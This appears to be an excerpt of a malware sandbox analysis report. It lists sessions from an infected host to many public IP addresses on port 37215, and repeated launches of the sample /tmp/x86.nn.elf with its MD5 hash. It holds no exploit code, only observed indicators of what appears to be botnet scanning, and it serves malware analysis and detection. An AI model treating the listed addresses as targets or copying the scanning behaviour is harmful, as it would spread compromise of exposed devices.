                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18101192.168.2.2342472197.129.204.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18102192.168.2.2339312197.38.35.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18103192.168.2.2352862157.85.238.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18104192.168.2.2352838130.35.99.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18105192.168.2.2340574158.234.102.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18106192.168.2.2342918157.101.88.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18107192.168.2.2335282161.184.134.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18108192.168.2.2334948197.129.171.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18109192.168.2.2354822197.218.36.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18110192.168.2.2349630157.208.173.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18111192.168.2.2357652197.65.52.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18112192.168.2.2346262197.159.146.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18113192.168.2.2335940197.147.44.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18114192.168.2.233439241.223.191.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18115192.168.2.2333534174.209.30.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18116192.168.2.235888441.107.38.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18117192.168.2.2344292197.45.8.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18118192.168.2.2343114189.237.134.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18119192.168.2.2336602157.207.104.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18120192.168.2.2358558157.190.141.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18121192.168.2.235654841.180.25.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18122192.168.2.235966241.156.186.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18123192.168.2.235392832.70.149.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18124192.168.2.233633441.210.233.11537215
                                          TimestampBytes transferredDirectionData


                                          System Behavior

                                          Start time (UTC):12:46:50
                                          Start date (UTC):28/05/2024
                                          Path:/tmp/x86.nn.elf
                                          Arguments:/tmp/x86.nn.elf
                                          File size:46576 bytes
                                          MD5 hash:df009b3d666e3ae272b1ae1a5f0df341

                                          Start time (UTC):12:46:50
                                          Start date (UTC):28/05/2024
                                          Path:/tmp/x86.nn.elf
                                          Arguments:-
                                          File size:46576 bytes
                                          MD5 hash:df009b3d666e3ae272b1ae1a5f0df341

                                          Start time (UTC):12:46:50
                                          Start date (UTC):28/05/2024
                                          Path:/tmp/x86.nn.elf
                                          Arguments:-
                                          File size:46576 bytes
                                          MD5 hash:df009b3d666e3ae272b1ae1a5f0df341

                                          Start time (UTC):12:46:50
                                          Start date (UTC):28/05/2024
                                          Path:/tmp/x86.nn.elf
                                          Arguments:-
                                          File size:46576 bytes
                                          MD5 hash:df009b3d666e3ae272b1ae1a5f0df341
                                          Start time (UTC):12:46:50
                                          Start date (UTC):28/05/2024
                                          Path:/tmp/x86.nn.elf
                                          Arguments:-
                                          File size:46576 bytes
                                          MD5 hash:df009b3d666e3ae272b1ae1a5f0df341